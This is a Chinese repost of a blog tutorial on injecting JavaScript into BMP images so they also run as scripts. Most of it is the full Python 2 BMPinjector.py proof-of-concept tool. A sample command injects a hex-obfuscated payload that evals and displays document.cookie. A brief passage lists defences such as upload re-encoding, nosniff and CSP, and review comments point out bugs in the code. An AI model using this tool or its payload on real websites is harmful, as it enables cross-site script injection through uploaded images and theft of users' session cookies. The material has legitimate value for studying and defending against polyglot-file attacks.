BMP图片中注入恶意JS代码


转自 http://marcoramilli.blogspot.com/2013/10/hacking-through-images.html（需翻墙）

http://danqingdani.blog.163.com/blog/static/186094195201392303213948/ (中文翻译)

1. 将原BMP文件的第三,第四字节替换为\x2F\x2A, 对应js中的注释符号/*
BMP文件的第三、四、五、六字节表示BMP文件的大小
2. 在BMP文件末尾添加
(1)\xFF
(2)\x2A\x2F,对应的js中的注释符号*/
(3)\x3D\x31\x3B，对应的 =1;，是为了伪造成BMP格式（从 JS 解析器的角度看，文件开头的 BM、被 /* */ 注释掉的图像数据和 =1; 一起构成一条合法语句 BM=1;，后面追加的 JS 才能被继续解析）
(4)定制的JS代码。这种 BMP/JS 多态文件只有在浏览器愿意把以 image/bmp 返回的资源当作 &lt;script&gt; 执行时才起作用：服务端对上传图片重新编码（会丢弃被篡改的大小字段和末尾追加的数据）、响应头 X-Content-Type-Options: nosniff，以及不包含图片托管源的 CSP script-src，都能阻断这种加载。

BMPinjector.py 代码如下

#!/usr/bin/env python2
# NOTE(review): this listing was recovered from a blog page that collapsed the
# whole file onto a few lines. Indentation and line breaks below are
# reconstructed; the code is Python 2 (str.decode('hex'), print statement).
#============================================================================================================#
#======= Simply injects a JavaScript Payload into a BMP. ====================================================#
#======= The resulting BMP must be a valid (not corrupted) BMP. =============================================#
#======= Author: marcoramilli.blogspot.com ==================================================================#
#======= Version: PoC (don't even think to use it in development env.) ======================================#
#======= Disclaimer: ========================================================================================#
#THIS SOFTWARE IS PROVIDED BY THE AUTHOR "AS IS" AND ANY EXPRESS OR
#IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
#WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
#DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT,
#INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
#(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
#SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
#HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
#STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING
#IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
#POSSIBILITY OF SUCH DAMAGE.
#===========================================================================================================#
import argparse
import os   # imported but not referenced anywhere in this file
#---------------------------------------------------------
def _hexify(num):
    """Return `num` as a raw (Python 2 str) big-endian byte string.

    The hex form is padded to an even number of digits and then decoded,
    so the result is the minimal number of bytes that holds `num`:
    its length varies with the value (1 byte below 256, 2 below 65536, ...).
    """
    num = "%x" % num
    if len(num) % 2:
        num = '0'+num
    # Python 2 only: str.decode('hex') turns the hex digits into raw bytes.
    return num.decode('hex')
#---------------------------------------------------------
#Example payload: "var _0xe428=[\""+ b'\x48\x65\x6C\x6C\x6F\x20\x57\x6F\x72\x6C\x64' + "\"]
#;alert(_0xe428[0]);"
def _generate_and_write_to_file(payload, fname):
    """Write a minimal hand-built BMP header followed by `payload` to `fname`.

    payload -- bytes (Python 2 str) appended verbatim after the header
    fname   -- output path; opened with "wb", so an existing file is overwritten
    Returns True. The header's "bitmap header size" field is filled from
    _hexify(len(payload)), whose length is not fixed at 4 bytes.
    """
    f = open(fname, "wb")
    header = (b'\x42\x4D'  #Signature BM
              b'\x2F\x2A\x00\x00' #Header File size, but encoded as /* <-- Yes it's a valid header
              b'\x00\x00\x00\x00' #Reserved
              b'\x00\x00\x00\x00' #bitmap data offset
              b''+ _hexify( len(payload) ) + #bitmap header size (variable length, see _hexify)
              b'\x00\x00\x00\x14' #width 20pixel .. it's up to you
              b'\x00\x00\x00\x14' #height 20pixel .. it's up to you
              b'\x00\x00' #nb_plan
              b'\x00\x00' #nb per pixel
              b'\x00\x10\x00\x00' #compression type
              b'\x00\x00\x00\x00' #image size .. its ignored
              b'\x00\x00\x00\x01' #Horizontal resolution
              b'\x00\x00\x00\x01' #Vertical resolution
              b'\x00\x00\x00\x00' #number of colors
              b'\x00\x00\x00\x00' #number important colors
              b'\x00\x00\x00\x80' #palette colors to be compliant
              b'\x00\x80\xff\x80' #palette colors to be compliant
              b'\x80\x00\xff\x2A' #palette colors to be compliant
              b'\x2F\x3D\x31\x3B' #*/=1;
              )
    # I made this explicit, step by step .
    f.write(header)
    f.write(payload)
    f.close()
    return True
#---------------------------------------------------------
def _generate_launching_page(f):
    """Write run.html in the current directory, referencing `f` twice.

    `f` is interpolated unescaped into an <img src> and a <script src>
    attribute. The file name "run.html" is fixed and is overwritten if present.
    Returns True.
    """
    # The line breaks of the original HTML template were lost when the
    # listing was collapsed; the runtime string is kept exactly as shown.
    htmlpage ="""<html><head><title>Opening an image</title> </head><body><img src=\"""" + f + """\"\><script src= \"""" + f + """\"> </script></body></html>"""
    html = open("run.html", "wb")
    html.write(htmlpage);
    html.close()
    return True
#---------------------------------------------------------
def _inject_into_file(payload, fname):
    r"""Overwrite bytes 2-3 of the existing BMP `fname` and append a trailer plus `payload`.

    payload -- bytes (Python 2 str) appended after the fixed trailer
    fname   -- path of the BMP to modify in place
    Returns True.
    NOTE: if the BMP contains \xFF\x2A it might cause issues (author's note).
    """
    # I know, I can do it all in memory and much more fast.
    # I wont do it here.
    # Phase 1: read the whole file into memory.
    f = open(fname, "r+b")
    b = f.read()
    # str.replace returns a new string and the result is not assigned,
    # so `b` is written back below unchanged.
    b.replace(b'\x2A\x2F',b'\x00\x00')
    f.close()
    # Phase 2: rewrite the file, then overwrite offsets 2-3 (start of the
    # little-endian file-size field) with the two bytes "/*".
    f = open(fname, "w+b")
    f.write(b)
    f.seek(2,0)
    f.write(b'\x2F\x2A')
    f.close()
    # Phase 3: append the fixed trailer (0xFF, "*/=1;") and the payload.
    f = open(fname, "a+b")
    f.write(b'\xFF\x2A\x2F\x3D\x31\x3B')
    f.write(payload)
    f.close()
    return True
#---------------------------------------------------------
if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument("filename",help="the bmp file name to be generated/or infected")
    parser.add_argument("js_payload",help="the payload to be injected. For exmample: \"alert(\"test\");\"")
    parser.add_argument("-i", "--inject-to-existing-bmp", action="store_true", help="inject into the current bitmap")
    args = parser.parse_args()
    # The banner's original line breaks were lost in the collapsed listing;
    # the runtime string is kept exactly as shown.
    print("""|======================================================================================================|| [!] legal disclaimer: usage of this tool for injecting malware to be propagated is illegal.          || It is the end user's responsibility to obey all applicable local, state and federal laws.            || Authors assume no liability and are not responsible for any misuse or damage caused by this program  ||======================================================================================================|""")
    if args.inject_to_existing_bmp:
        _inject_into_file(args.js_payload, args.filename)
    else:
        _generate_and_write_to_file(args.js_payload, args.filename)
    # NOTE(review): whether this call sits inside the else: branch or at this
    # level is not recoverable from the collapsed listing; shown here unconditionally.
    _generate_launching_page(args.filename)
    print "[+] Finished!"


执行

python BMPinjector.py -i 1.bmp "var _0x9c4c=\"\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x63\x6f\x6f\x6b\x69\x65\"; function MsgBox(_0xccb4x3){alert(eval(_0xccb4x3));} ;MsgBox(_0x9c4c);"

效果如图




